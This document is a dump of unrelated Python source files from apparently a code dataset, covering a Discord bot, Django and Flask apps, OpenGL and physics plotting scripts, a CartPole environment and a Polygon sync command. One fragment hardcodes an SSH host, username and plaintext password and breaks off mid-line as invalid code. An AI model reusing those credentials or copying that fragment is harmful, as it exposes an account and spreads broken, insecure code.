if log[0] == 'WARNING':
print (worker)
files = [ x for x in log[1].split() if x.count('xrootd') ]
print ( files )
allFiles += files
return allFiles
cluster = make_htcondor_cluster(local=False, dashboard_address=13349, disk = "10GB", memory = "5GB",)
print ("Scaling cluster at address %s now."%cluster.scheduler_address)
cluster.scale(25)
with open('scheduler_address.txt', 'w') as f:
f.write(str(cluster.scheduler_address))
c = Client(cluster)
|
11,061 | e80e72afffcb05c77016cc8355df70e63c4411aa | import asyncio
import discord
from discord.ext.commands import Bot
from discord.ext import commands
from discord import Color, Embed
import backend.commands as db
from backend import strikechannel
# This command allows players to change their name.
#
# !name [new_name]
#
# This replaces the default nickname changing that Discord provides so
# that their name will also be replaced in the spreadsheet.
class Name(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.strike_channel_id = strikechannel
@commands.command()
async def name(self, ctx):
old_name = ctx.author.display_name
new_name = ctx.message.content[6:]
print(old_name)
print(new_name)
# This changes their name in the "#strikes" channel
channel = self.bot.get_channel(self.strike_channel_id)
async for msg in channel.history(limit=None):
text = msg.content.replace("```", "")
text_lst = text.split("\n")
d = {}
for line in text_lst:
try:
name, strikes = line.rsplit(" - ", 1)
except:
continue
d[name] = int(strikes)
if old_name in d:
d[new_name] = d[old_name]
del d[old_name]
inner_text = ""
for k, v in d.items():
inner_text += f"{k} - {v}\n"
full_text = f"```\n{inner_text}```"
await msg.edit(content=full_text)
db.change_name(old_name, new_name)
await ctx.author.edit(nick=new_name)
await ctx.channel.send("Name Changed!")
def setup(bot):
bot.add_cog(Name(bot))
|
11,062 | 449adeca7e2b30182d505128625a3779ae24c6e2 | import turtle
turtle.hideturtle()
turtle.speed('fastest')
turtle.tracer(False)
def petal(radius,steps):
turtle.circle(radius,90,steps)
turtle.left(90)
turtle.circle(radius,90,steps)
num_petals = 8
steps = 8
radius = 100
for i in range(num_petals):
turtle.setheading(0)
turtle.right(360*i/num_petals)
petal(radius,steps)
turtle.tracer(True)
turtle.done()
|
11,063 | b2e27f6f56d1517f5400246859a969d2797a5ca2 | # Generated by Django 2.0.4 on 2018-05-19 23:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('journal', '0004_auto_20180519_2343'),
]
operations = [
migrations.AlterField(
model_name='news',
name='approved',
field=models.BooleanField(default=False),
),
] |
11,064 | 05482089251131e719ea1b5aee9af241371a852d | import os
from flask import Blueprint
from . import views
blueprint = Blueprint('flasksaml2idp', __name__, template_folder=os.path.join(os.path.dirname(__file__), 'templates'))
blueprint.add_url_rule('/sso/post', 'saml_login_post', views.sso_entry, methods=['GET', 'POST'])
blueprint.add_url_rule('/sso/redirect', 'saml_login_redirect', views.sso_entry)
blueprint.add_url_rule('/sso/init', 'saml_idp_init', views.SSOInitView.as_view('saml_idp_init'))
blueprint.add_url_rule('/login/process/', 'saml_login_process', views.LoginProcessView.as_view('saml_login_process'))
blueprint.add_url_rule('/login/process_multi_factor/', 'saml_multi_factor',
views.ProcessMultiFactorView.as_view('saml_multi_factor'), methods=['GET'])
blueprint.add_url_rule('/metadata/', 'saml2_idp_metadata', views.metadata)
@blueprint.after_request
def disable_cache(response):
"""
Post processor that adds headers to a response so that it will never be cached.
"""
response.headers['Cache-Control'] = 'max-age=0, no-cache, no-store, must-revalidate, private'
response.headers['Pragma'] = 'no-cache'
response.headers['Expires'] = '0'
return response
|
11,065 | d1cd4afe3822417cb873854e356ab3626f22c182 | import builtins
from django.shortcuts import render, render_to_response
from django.http import HttpResponse, HttpResponseRedirect
import os
# 包装csrf请求,避免django认为其实跨站攻击脚本
from django.views.decorators.csrf import csrf_exempt
from .models import Program,person,log_report
# 保存数据
@csrf_exempt
def add(request):
# c={}
id = request.POST['id']
URL = request.POST['URL']
StatsCode = request.POST['StatsCode']
Response = request.POST['Response']
st = Program()
if len(id) > 0:
print("id不是null")
st.id = id
st.StatsCode = StatsCode
st.URL = URL
st.Response = Response
st.save()
return HttpResponseRedirect("/q")
# 查询所有
def query(request):
b = Program.objects.all()
return render_to_response('curd.html', {'data': b})
# 显示一条数据
def showUid(request):
id = request.GET['id'];
bb = Program.objects.get(id=id)
return render_to_response('update.html', {'data': bb})
# 删除数据
def delByID(request):
# id = request.GET['id'];
# bb = Program.objects.get(id=id)
# bb.delete()
os.system("python D:\\website\website\\ScriptT\\SQLine.py")
return HttpResponseRedirect("/Performance/HomePage")
#接口文档数据展示
def InterFace(request):
b = person.objects.all()
return render_to_response('InterFace.html', {'data': b})
#接口文档数据展示
def ErrorCode(request):
b = log_report.objects.all()
return render_to_response('ErrorCode.html', {'data': b})
#跳转性能报告界面
def perfor(request):
return render_to_response('index.html')
#自动测试用例展现首页
def CaseHome(request):
b = log_report.objects.all()
return render_to_response('ErrorCode.html', {'data': b})
#添加自动化测试用例
def addCase(request):
print("+++")
#删除自动化测试用例
def DeletCase(request):
print("----")
#成功的测试用例
#失败的测试用例 |
11,066 | 48ae4709bcbabe8098d6a002556de91aba068429 | # test viper with multiple subscripts in a single expression
@micropython.viper
def f1(b: ptr8):
b[0] += b[1]
b = bytearray(b"\x01\x02")
f1(b)
print(b)
@micropython.viper
def f2(b: ptr8, i: int):
b[0] += b[i]
b = bytearray(b"\x01\x02")
f2(b, 1)
print(b)
@micropython.viper
def f3(b: ptr8) -> int:
return b[0] << 24 | b[1] << 16 | b[2] << 8 | b[3]
print(hex(f3(b"\x01\x02\x03\x04")))
|
11,067 | b3a5b04ff31fba2df233f4475de351ac4193288e | # Learn Python the Hard Way Exercise 19 SD3
def my_function(arg1, arg2):
print "summing arg1: %r and arg2: %r..." % (arg1, arg2)
print arg1 + arg2
print "1. Call function by inserting numbers:"
my_function(4, 44)
print "2. Call funtion by inserting strings:"
my_function('cat', 'dog')
print "3. Call funtion with integer variables"
x = 400
y = 440
my_function(x, y)
print "4. Call funtion with string variables"
a, b = 'snake', 'mouse'
my_function(a, b)
print "5. Values from other functions, here is randint:"
import random
my_function(random.randint(1,100), random.randint(1,100))
print "6. Values from raw input:"
d = raw_input("Please enter a value to be summed:")
my_function(d, d)
print "7. Values from math in function"
my_function(4 + 6, 5 + 5)
print "8. Raw input plus math"
e = raw_input("Enter a value: ")
my_function(e, e + e)
print "9. Raw input directly in the function call"
my_function(raw_input("Enter first number: "), raw_input("enter second number: "))
print "10. How about a string and an integer"
my_function(str(4), 'dogs')
|
11,068 | 3966bc4e51d00725278c86fe98b9b3e248d5ac74 | # Wood, Jeff
# 100-103-5461
# 2016-05-02
# Assignment_05
# From
# http:
import sys
import OpenGL
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
Angle = 0
Incr = 1
def create_pyramid():
glNewList(1,GL_COMPILE)
glBegin(GL_TRIANGLES)
glVertex3f(0,0,0)
glVertex3f(1,1,0)
glVertex3f(0,1,0)
glVertex3f(0,0,0)
glVertex3f(1,0,0)
glVertex3f(1,1,0)
glColor3f(0,1,0)
glVertex3f(0,0,0)
glVertex3f(0,1,0)
glVertex3f(0.5,0.5,1)
glColor3f(0,0,1)
glVertex3f(0,1,0)
glVertex3f(1,1,0)
glVertex3f(0.5,0.5,1)
glColor3f(1,1,0)
glVertex3f(1,1,0)
glVertex3f(1,0,0)
glVertex3f(0.5,0.5,1)
glColor3f(1,0,1)
glVertex3f(1,0,0)
glVertex3f(0,0,0)
glVertex3f(0.5,0.5,1)
glEnd()
glEndList()
def create_3d_axes():
glNewList(2,GL_COMPILE)
glBegin(GL_LINES)
glColor3f(1,0,0)
glVertex3f(0,0,0)
glVertex3f(2,0,0)
glEnd()
glBegin(GL_LINES)
glColor3f(0,1,0)
glVertex3f(0,0,0)
glVertex3f(0,2,0)
glEnd()
glBegin(GL_LINES)
glColor3f(0,0,1)
glVertex3f(0,0,0)
glVertex3f(0,0,2)
glEnd()
glEndList()
def display():
global Angle
global Incr
w=glutGet(GLUT_WINDOW_WIDTH)
h=glutGet(GLUT_WINDOW_HEIGHT)
## Upper-Left
glEnable(GL_SCISSOR_TEST)
glScissor(int(0.05*w),int(0.55*h),int(0.4*w),int(0.4*h))
glClearColor(0.4,0.4,0.6,0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glFrustum(-1,1,-1,1,1,30)
gluLookAt(0,0,3,0,0,0,0,1,0)
glMatrixMode(GL_MODELVIEW)
glViewport(int(0.05*w),int(0.55*h),int(0.4*w),int(0.4*h))
glCallList(1)
glPushMatrix()
glLoadIdentity()
glCallList(2)
glPopMatrix()
## Lower-Left
glEnable(GL_SCISSOR_TEST)
glScissor(int(0.05*w),int(0.05*h),int(0.4*w),int(0.4*h))
glClearColor(0.4,0.4,0.6,0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glFrustum(-1,1,-1,1,1,30)
gluLookAt(0,3,0,0,0,0,0,0,1)
glMatrixMode(GL_MODELVIEW)
glViewport(int(0.05*w),int(0.05*h),int(0.4*w),int(0.4*h))
glCallList(1)
glPushMatrix()
glLoadIdentity()
glCallList(2)
glPopMatrix()
## Upper-Right
glScissor(int(0.55*w),int(0.55*h),int(0.4*w),int(0.4*h))
glClearColor(0.4,0.4,0.6,0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
#glFrustum(-1,1,-1,1,1,30)
gluPerspective(45,.5,1,30)
gluLookAt(3,0,0,0,0,0,0,1,0)
glMatrixMode(GL_MODELVIEW)
glViewport(int(0.55*w),int(0.55*h),int(0.4*w),int(0.4*h))
glCallList(1)
glPushMatrix()
glLoadIdentity()
glCallList(2)
glPopMatrix()
## Lower-Right
glScissor(int(0.55*w),int(0.05*h),int(0.4*w),int(0.4*h))
glClearColor(0.4,0.4,0.6,0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(-1,1,-1,1,1,30)
#glFrustum(-1,1,-1,1,1,30)
gluLookAt(2,2,2,0,0,0,0,1,0)
glMatrixMode(GL_MODELVIEW)
glViewport(int(0.55*w),int(0.05*h),int(0.4*w),int(0.4*h))
glCallList(1)
glPushMatrix()
glLoadIdentity()
glCallList(2)
glPopMatrix()
glFlush()
glutSwapBuffers()
glLoadIdentity()
glRotated(Angle,0,1,0)
Angle = Angle + Incr
def keyHandler(Key, MouseX, MouseY):
global Incr
if Key == b'f' or Key == b'F':
print (b"Speeding Up")
Incr = Incr + 1
elif Key == b's' or Key == b'S':
if Incr == 0:
print ("Stopped")
else:
print ("Slowing Down")
Incr = Incr - 1
elif Key == b'q' or Key == b'Q':
print ("Bye")
sys.exit()
else:
print ("Invalid Key ",Key)
def timer(dummy):
display()
glutTimerFunc(30,timer,0)
def reshape(w, h):
print ("Width=",w,"Height=",h)
def init():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_DOUBLE|GLUT_RGB|GLUT_DEPTH)
glutInitWindowSize(800, 500)
glutInitWindowPosition(100, 100)
glutCreateWindow(b"PyOpenGL Demo")
glClearColor(1,1,0,0)
glPolygonMode(GL_FRONT_AND_BACK,GL_FILL)
glEnable(GL_DEPTH_TEST)
glDepthFunc(GL_LESS);
def callbacks():
glutDisplayFunc(display)
glutKeyboardFunc(keyHandler)
glutTimerFunc(300,timer,0)
glutReshapeFunc(reshape)
def draw():
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glMatrixMode(GL_MODELVIEW)
create_pyramid()
create_3d_axes()
def main():
init()
callbacks()
draw()
glutMainLoop()
main()
|
11,069 | 9375c1ac6a32a1ac882ffc34575d8a915bbbe766 | import ROOT
import sys
sys.path.insert(0, '/afs/cern.ch/work/k/kpachal/PythonModules/art/')
import AtlasStyle
AtlasStyle.SetAtlasStyle()
ROOT.gROOT.ForceStyle()
# Want to compare 3 things:
# - points in the nose where there is disagreement:
# - mMed = 750 & 800, mDM = 1.0, A-V plot couplints
# with points from the paper couplings which match this plot:
# https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CombinedSummaryPlots/EXOTICS/ATLAS_DarkMatterCoupling_Summary/ATLAS_DarkMatterCoupling_Summary.pdf
# where we have 10% width and 7% width
# Analysis couplings available: up to 0.4
infile_narrow = "/afs/cern.ch/work/k/kpachal/TLA2017/CleanLimitCode/inputs/dataLikeHists_yStar06/dataLikeHistograms.m{0}_g0.05.root"
infile_broad = "/afs/cern.ch/work/k/kpachal/TLA2017/CleanLimitCode/inputs/dataLikeHists_yStar06/dataLikeHistograms.m{0}_g0.40.root"
infile_target = "/afs/cern.ch/work/k/kpachal/TLA2017/CleanLimitCode/inputs/signalsForMassMass/DijetTLA_13TeV2018_Full20152016_A2_y06_dataLikeHists_v1/dataLikeHistograms.{0}.root"
# this correlates the two points on the x axis which we want to check
# to DSIDs
DSIDtoMass = {
310055 : {"mMed" : 750.0},
310065 : {"mMed" : 800.0}
}
# Check both masses
for mass in ["0.75","0.8"] :
# Get all 3 hists
open_narrow = ROOT.TFile.Open(infile_narrow.format(mass))
hist_narrow = open_narrow.Get("mjj_Scaled_m{0}_g0.05_1fb_Nominal".format(mass))
hist_narrow.SetDirectory(0)
open_narrow.Close()
open_broad = ROOT.TFile.Open(infile_broad.format(mass))
hist_broad = open_broad.Get("mjj_Scaled_m{0}_g0.40_1fb_Nominal".format(mass))
hist_broad.SetDirectory(0)
open_broad.Close()
mass_number = eval(mass)*1000.
for DSID in DSIDtoMass.keys() :
if (DSIDtoMass[DSID]["mMed"] - mass_number)/mass_number < 0.01 :
break
open_target = ROOT.TFile.Open(infile_target.format(DSID))
hist_target = open_target.Get("Nominal/mjj_Scaled_{0}_1fb".format(DSID))
hist_target.SetDirectory(0)
open_target.Close()
# Want to plot the three on top of each other
# Normalise for convenience of comparing
hist_narrow.Scale(1.0/hist_narrow.Integral())
hist_broad.Scale(1.0/hist_broad.Integral())
hist_target.Scale(1.0/hist_target.Integral())
c = ROOT.TCanvas("c_{0}".format(mass),'',0,0,800,600)
hist_narrow.SetLineColor(ROOT.kGreen+2)
hist_narrow.SetLineWidth(2)
hist_narrow.GetXaxis().SetTitle("Mass [GeV]")
hist_narrow.GetYaxis().SetTitle("A.U.")
hist_narrow.GetXaxis().SetRangeUser(mass_number*(0.5),mass_number*(1.4))
hist_target.SetLineColor(ROOT.kMagenta+1)
hist_target.SetLineWidth(2)
hist_broad.SetLineColor(ROOT.kBlue)
hist_broad.SetLineWidth(2)
hist_narrow.Draw("HIST")
hist_broad.Draw("HIST SAME")
hist_target.Draw("HIST SAME")
c.Update()
c.SaveAs("plots/width_comparison_{0}.eps".format(mass))
# Now: we want a version that fits the signal we're interested in.
# Parameters: mean, sigma
# Constrain to range where peak is
mygaussian = ROOT.TF1("gaus","gaus",0.9*mass_number,1.1*mass_number)
result = hist_target.Fit(mygaussian,"R0S")
# Retrieve values
parameters = result.Parameters()
# mean = mygaussian.GetParameter(0)
# width = mygaussian.GetParameter(1)
norm = parameters[0]
mean = parameters[1]
width = parameters[2]
print "Fit parameters are",parameters
print "I think these are normalisation, mean, and width according to Caterina's code"
print "This is equivalent to a fractional width of width/mean_mass =",width/mean
# Plot
c = ROOT.TCanvas("c_{0}_fit".format(mass),'',0,0,800,600)
hist_target.SetLineColor(ROOT.kBlack)
hist_target.GetXaxis().SetTitle("Mass [GeV]")
hist_target.GetYaxis().SetTitle("A.U.")
hist_target.GetXaxis().SetRangeUser(mass_number*(0.5),mass_number*(1.4))
hist_target.Draw()
mygaussian.Draw("SAME")
# Fit results
newtext = ROOT.TLatex()
newtext.SetNDC()
newtext.SetTextSize(0.04)
newtext.SetTextFont(42)
newtext.SetTextAlign(11)
newtext.DrawLatex(0.2,0.85,"Mean mass: {0:.2f} GeV".format(mean))
newtext.DrawLatex(0.2,0.8,"1#sigma width: {0:.2f} GeV".format(width))
newtext.DrawLatex(0.2,0.75,"Relative width: {0:.3f}".format(width/mean))
c.Update()
c.SaveAs("plots/width_fit_{0}.eps".format(mass))
|
11,070 | 0db7579e62ad435bdfa5c2a9709e37558b6e30e8 | /bin/bash
import watchdog
import paramiko, base64
import os
key = paramiko.RSAKey(data=base64.decodestring('D6YV3EVlAiWZB&nm'))
client = paramiko.SSHClient()
client.get_host_keys().add('dragoncave8.ddns.net', 'ssh-rsa', key)
client.connect('dragoncave8.ddns.net',username='stpaddock', password='D6YV3EVlAiWZB&nm')
stdin, stdout, stderr = client.exec_command('ls')
for line in stdout:
if line == os.
|
11,071 | ba67c7147c6a390fefa81291df9a6fdb13d0655d | import json
import drugs.utils as utils
from django.conf import settings
from suds.client import Client
# get soap wsdl endpoint from settings (use WS Authentication)
client = Client(settings.DJANGOPHARMA_SOAP_URL,
headers={'username': settings.WS_USERNAME,
'password': settings.WS_PASSWORD})
# get all drugs
def get_all_drugs():
response = client.service.fetchAllDrugs()
if response.ResponseCode == 'C':
# convert the xml to json
json_data = utils.xml2json(response)
return json_data
else:
return None
# get drug categories
def get_drug_categories():
response = client.service.getDrugCategories()
if response.ResponseCode == 'C':
# convert the xml to json
json_data = utils.xml2json(response)
drug_categories = json.loads(json_data)['drugCategory']
return drug_categories
else:
return None
# get drug
def get_drug(drug_id):
response = client.service.findDrug(drug_id)
if response.ResponseCode == 'C':
# convert the xml to json
json_data = utils.xml2json(response)
obj = json.loads(json_data)['drug']
# WS returns a list of Drugs - for this call it will be always 1 element
return obj[0]
else:
return None
# add drug
def insert_drug(drug):
# create the request for the WS
request_data = {'id': drug.id, 'friendlyName': drug.friendly_name,
'availability': drug.availability,
'description': drug.description,
'price': str(drug.price),
'categoryId': drug.category.id,
'imagePath': drug.imagePath}
response = client.service.addDrug(request_data)
if response.ResponseCode == 'C':
# convert the xml to json
json_data = utils.xml2json(response)
obj = json.loads(json_data)['drug']
# WS returns a list of Drugs - for this call it will be always 1 element
return obj[0]
else:
return None
# update drug
def update_drug(drug):
# create the request for the WS
request_data = {'id': drug.id, 'friendlyName': drug.friendly_name,
'availability': drug.availability,
'description': drug.description,
'price': str(drug.price),
'categoryId': drug.category.id}
response = client.service.updateDrug(request_data)
if response.ResponseCode == 'C':
# convert the xml to json
json_data = utils.xml2json(response)
obj = json.loads(json_data)['drug']
# WS returns a list of Drugs - for this call it will be always 1 element
return obj[0]
else:
return None
# insert drug category
def insert_drug_category(category):
# create the request for the WS
request_data = {'id': category.id, 'name': category.name,
'description': category.description}
response = client.service.addDrugCategory(request_data)
# the response does not contain the drug category
if response.ResponseCode == 'C':
return True
else:
return False
# update drug category
def update_drug_category(category):
# create the request for the WS
request_data = {'id': category.id, 'name': category.name,
'description': category.description}
response = client.service.updateDrugCategory(request_data)
# the response does not contain the drug category
if response.ResponseCode == 'C':
return True
else:
return False
|
11,072 | 3d843f3fc6cc71d37379a93cee774ef06883594c | # Getter mehtods allow reading a properties values
# Setters allows modifying a properties value
class User:
def __init__(self, username=None):
# definie the initializer
self.__username = username
# defining the setter
def setUsername(self, x):
# defining self as the value passed in as x
self.__username = x
# defining the getter
def getUsername(self):
# simply returning the private variable username
return (self.__username)
Steve = User('steve1')
print('Before setting:', Steve.getUsername())
Steve.setUsername('steve2')
print('After setting:', Steve.getUsername())
# Before setting: steve1
# After setting: steve2
|
11,073 | fc256aaeec5a40b1c959025facff21838c0e6fb1 | from hathor.graphviz import GraphvizVisualizer
from tests import unittest
from tests.simulation.base import SimulatorTestCase
from tests.utils import gen_custom_tx
class BaseConsensusSimulatorTestCase(SimulatorTestCase):
def create_chain(self, manager, first_parent_block_hash, length, prefix, tx_parents=None):
current = first_parent_block_hash
v = []
for i in range(length):
blk = manager.generate_mining_block(parent_block_hash=current)
blk.weight = min(50.0, blk.weight)
blk.nonce = self.rng.getrandbits(32)
if tx_parents:
blk.parents[1:] = tx_parents
blk.update_hash()
self.graphviz.labels[blk.hash] = f'{prefix}b{i}'
self.assertTrue(manager.propagate_tx(blk))
self.simulator.run(10)
v.append(blk)
current = blk.hash
return v
def test_conflict_with_parent_tx(self):
manager1 = self.create_peer()
manager1.allow_mining_without_peers()
self.graphviz = GraphvizVisualizer(manager1.tx_storage, include_verifications=True, include_funds=True)
b1 = manager1.generate_mining_block()
b1.nonce = self.rng.getrandbits(32)
b1.update_hash()
self.graphviz.labels[b1.hash] = 'b1'
self.assertTrue(manager1.propagate_tx(b1))
self.simulator.run(10)
A_list = self.create_chain(manager1, b1.hash, 15, 'A-')
tx1 = gen_custom_tx(manager1, [(A_list[0], 0)])
tx1.parents = manager1.get_new_tx_parents(tx1.timestamp)
tx1.update_hash()
self.graphviz.labels[tx1.hash] = 'tx1'
self.assertTrue(manager1.propagate_tx(tx1))
tx2 = gen_custom_tx(manager1, [(tx1, 0)])
tx2.parents = manager1.get_new_tx_parents(tx2.timestamp)
tx2.update_hash()
self.graphviz.labels[tx2.hash] = 'tx2'
self.assertTrue(manager1.propagate_tx(tx2))
tx31 = gen_custom_tx(manager1, [(tx2, 0)])
self.graphviz.labels[tx31.hash] = 'tx3-1'
self.assertTrue(manager1.propagate_tx(tx31))
tx32 = gen_custom_tx(manager1, [(tx2, 0)])
tx32.parents = [tx31.hash, tx2.hash]
tx32.timestamp = tx31.timestamp + 1
tx32.update_hash()
self.graphviz.labels[tx32.hash] = 'tx3-2'
self.assertTrue(manager1.propagate_tx(tx32))
self.assertIsNone(tx31.get_metadata().voided_by)
self.assertEqual({tx32.hash}, tx32.get_metadata().voided_by)
self.create_chain(manager1, b1.hash, 20, 'B-', tx_parents=b1.parents[1:])
self.assertEqual({A_list[0].hash, tx31.hash}, tx31.get_metadata().voided_by)
self.assertEqual({A_list[0].hash, tx31.hash, tx32.hash}, tx32.get_metadata().voided_by)
# Uncomment lines below to visualize the DAG and the blockchain.
# dot = self.graphviz.dot()
# dot.render('dot0')
class SyncV1ConsensusSimulatorTestCase(unittest.SyncV1Params, BaseConsensusSimulatorTestCase):
__test__ = True
class SyncV2ConsensusSimulatorTestCase(unittest.SyncV2Params, BaseConsensusSimulatorTestCase):
__test__ = True
# sync-bridge should behave like sync-v2
class SyncBridgeConsensusSimulatorTestCase(unittest.SyncBridgeParams, SyncV2ConsensusSimulatorTestCase):
__test__ = True
|
11,074 | 63596a9a0c242ead8c061cb17a7725a4bdc42dd0 | import lyricsgenius
genius = lyricsgenius.Genius(token) |
11,075 | 9c64e955e344307960a69fc2d0335335b5698760 | import gym
import torch
import numpy as np
import torchvision.transforms as T
import matplotlib.pyplot as plt
from IPython import display as ipythondisplay
class CartPoleEnvManager():
def __init__(self, device, env_wrapper=lambda x: x, timestep_limit = 100, xvfb_mode=False):
self.device = device
env = gym.make('CartPole-v0').unwrapped
#env = gym.make('CartPole-v0')
env.spec.timestep_limit = timestep_limit
#self.env = env_wrapper(env)
self.env = env
self.env.reset()
self.current_screen = None
self.done = False
self.xvfb_mode = xvfb_mode
def reset(self):
self.env.reset()
self.current_screen = None
def close(self):
self.env.close()
def render(self, mode='human'):
screen = self.env.render(mode)
return screen
def num_actions_available(self):
return self.env.action_space.n
def take_action(self, action):
#print('in take_action; done=', self.env.env.done)
_, reward, self.done, _ = self.env.step(action.item())
return torch.tensor([reward], device=self.device) # step() expects normal number, not torch tensor!
def just_starting(self):
return self.current_screen is None
# The state is defined as the difference between the current screen and the previous screen
def get_state(self):
if self.just_starting() or self.done:
self.current_screen = self.get_processed_screen()
black_screen = torch.zeros_like(self.current_screen)
return black_screen
else:
s1 = self.current_screen
s2 = self.get_processed_screen()
self.current_screen = s2
return s2 - s1
def get_screen_height(self):
screen = self.get_processed_screen()
return screen.shape[2]
def get_screen_width(self):
screen = self.get_processed_screen()
return screen.shape[3]
def get_processed_screen(self):
screen = self.render('rgb_array')
screen = self.crop_screen(screen, hwc=True)
#if self.xvfb_mode:
# plt.imshow(screen)
#ipythondisplay.clear_output(wait=True)
# ipythondisplay.display(plt.gcf())
return self.transform_screen_data(screen.transpose((2, 0, 1))) # CHW is expected HWC -> CHW
def crop_screen(self, screen, hwc=True):
screen_height = screen.shape[0] if hwc else screen.shape[1]
screen_width = screen.shape[1] if hwc else screen.shape[0]
# Strip off top bottom
top = int(screen_height * 0.4)
bottom = int(screen_height * 0.8)
left = int(screen_width * 0.2)
right = int(screen_width * 0.8)
screen = screen[top:bottom, left:right, :] if hwc else screen[left:right, top:bottom, :]
return screen
def transform_screen_data(self, screen):
# Convert to float, rescale, convert to tensor
screen = np.ascontiguousarray(screen, dtype=np.float32) / 255
screen = torch.from_numpy(screen)
# use torchvision package to compose image transformations
resize = T.Compose([
T.ToPILImage()
,T.Resize((40,90))
,T.ToTensor()
])
return resize(screen).unsqueeze(0).to(self.device)
|
11,076 | 02c4131a1a645489929cf87048db43c3b074e938 | """KERNEL SVM"""
from sklearn.svm import SVC
classifier4 = SVC(kernel = 'rbf', random_state = 0)
classifier4.fit(X_train, y_train)
y_pred4 = classifier.predict(X_test)
print(np.concatenate((y_pred4.reshape(len(y_pred4),1), y_test.reshape(len(y_test),1)),1))
from sklearn.metrics import confusion_matrix, accuracy_score
cm4 = confusion_matrix(y_test, y_pred4)
print(cm4)
accuracy_score(y_test, y_pred4)
print("Training score:{:.3f}".format(classifier4.score(X_train, y_train)))
print("Test score:{:.3f}".format(classifier4.score(X_test, y_test)))
|
11,077 | 5106da050825a85069464e4267d9f3b48c49b628 | from django.contrib import admin
from models import Message,Notification,Detail,Location, Organization, Account, Profile, Action
admin.site.register(Message)
admin.site.register(Notification)
admin.site.register(Detail)
class LocationAdmin(admin.ModelAdmin):
fields = ['place', 'postalcode', 'address', 'county', 'country']
list_display = ('address', 'place', 'postalcode', 'county', 'country')
admin.site.register(Location, LocationAdmin)
class OrganizationAdmin(admin.ModelAdmin):
fieldsets = [
('Name', {'fields': ['name']}),
('Phone', {'fields': ['phone']}),
('Location', {'fields': ['location']}),
]
list_display = ('name', 'location', 'phone')
admin.site.register(Organization, OrganizationAdmin)
class AccountAdmin(admin.ModelAdmin):
fields = ['role', 'profile', 'user','approved']
list_display = ('role', 'profile')
admin.site.register(Account, AccountAdmin)
class ProfileAdmin(admin.ModelAdmin):
fields = [
'firstname',
'lastname',
'IDNO',
'sex',
'birthday',
'phone',
'address',
]
list_display = ('firstname', 'lastname', 'birthday', 'created')
admin.site.register(Profile, ProfileAdmin)
class ActionAdmin(admin.ModelAdmin):
readonly_fields = ('timePerformed',)
fields = [
'type',
'description',
'account',
]
list_display = ('account', 'type', 'description', 'timePerformed')
list_filter = ('account', 'type', 'timePerformed')
ordering = ('-timePerformed',)
admin.site.register(Action, ActionAdmin)
|
11,078 | a9f67dffdfba590ec804b97cc08f86bcfc6c0a27 | import base64
img_data = b"<base64 here>"
with open("imageToSave.jpg", "wb") as fh:
fh.write(base64.decodebytes(img_data))
|
11,079 | 47efe60073d3773351dfc014db15705407daedf0 | from enum import Enum
class ExitStatus(Enum):
SUCCESS = 0
FAILURE = 1
def reportStatusAndExit(errorCount, checkPrefix):
exitStatus = ExitStatus.SUCCESS
if errorCount > 0:
exitStatus = ExitStatus.FAILURE
print (f'{checkPrefix} {exitStatus.name}\n')
exit(exitStatus.value)
|
11,080 | 70be91e52d55c099adf3dc4f9609a906782b965b | #倒序删除
#因为列表总是‘向前移’,所以可以倒序遍历,即使后面的元素被修改了,还没有被遍历的元素和其坐标
#还是保持不变的
a=[1,2,3,4,5,6,7,8]
print(id(a))
for i in range(len(a)-1,-1,-1):
if a[i]>5:
pass
else:
a.remove(a[i])
print(id(a))
print('-----------')
print(a) |
11,081 | 8294c6b2645cd92f6e445c54b59c76795074d505 | import time
import traceback
import django.core.mail
from constance import config
from django.conf import settings
from django.core import management
from django.db import transaction
from django.utils import translation
from polygon_client import Polygon, PolygonRequestFailedException
from modules.polygon import models
# How many seconds to wait before each retry attempt
RETRY_DELAY = [1, 4, 16]
ATTEMPTS_COUNT = len(RETRY_DELAY) + 1
class Command(management.base.BaseCommand):
help = 'Update problems metadata from Polygon'
requires_migrations_checks = True
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.error = None
def handle(self, *args, **options):
translation.activate(settings.LANGUAGE_CODE)
# TODO(artemtab): more granular retries. At least we shouldn't repeat
# successful Polygon requests if something unrelated goes wrong.
last_exception_trace = None
for i in range(ATTEMPTS_COUNT):
try:
# Wait before retries
if i > 0:
time.sleep(RETRY_DELAY[i - 1])
self.sync()
break
except Exception:
trace = traceback.format_exc()
print(trace)
last_exception_trace = trace
else:
message = (
'Error when syncing with polygon:\n\n{}'
.format(last_exception_trace))
django.core.mail.mail_admins('Sync with Polygon failed', message)
return
def sync(self):
"""
Try to sync local polygon information with the actual Polygon.
Throws an exception if something goes wrong.
"""
p = Polygon(
api_url=config.SISTEMA_POLYGON_URL,
api_key=config.SISTEMA_POLYGON_KEY,
api_secret=config.SISTEMA_POLYGON_SECRET,
)
# Problems
problems = p.problems_list()
print('Found {} problems in Polygon. Syncing...'.format(len(problems)))
for polygon_problem in problems:
self.update_problem(polygon_problem)
print('.', end='', flush=True)
print()
# Contests
print('Syncing contests')
contest_id = 1
last_updated_contest_id = 0
while True:
try:
problem_set = p.contest_problems(contest_id)
last_updated_contest_id = contest_id
print('.', end='', flush=True)
except PolygonRequestFailedException:
print('_', end='', flush=True)
# If at some point the specified number of contests in a row are
# missing we consider that there are no more contests to sync.
current_gap = contest_id - last_updated_contest_id
if current_gap > config.SISTEMA_POLYGON_MAXIMUM_CONTEST_ID_GAP:
break
self.update_contest(contest_id, problem_set)
contest_id += 1
print()
@transaction.atomic
def update_problem(self, polygon_problem):
local_problem = (
models.Problem.objects
.filter(polygon_id=polygon_problem.id)
.prefetch_related('tags')
.first())
if local_problem is None:
local_problem = models.Problem(
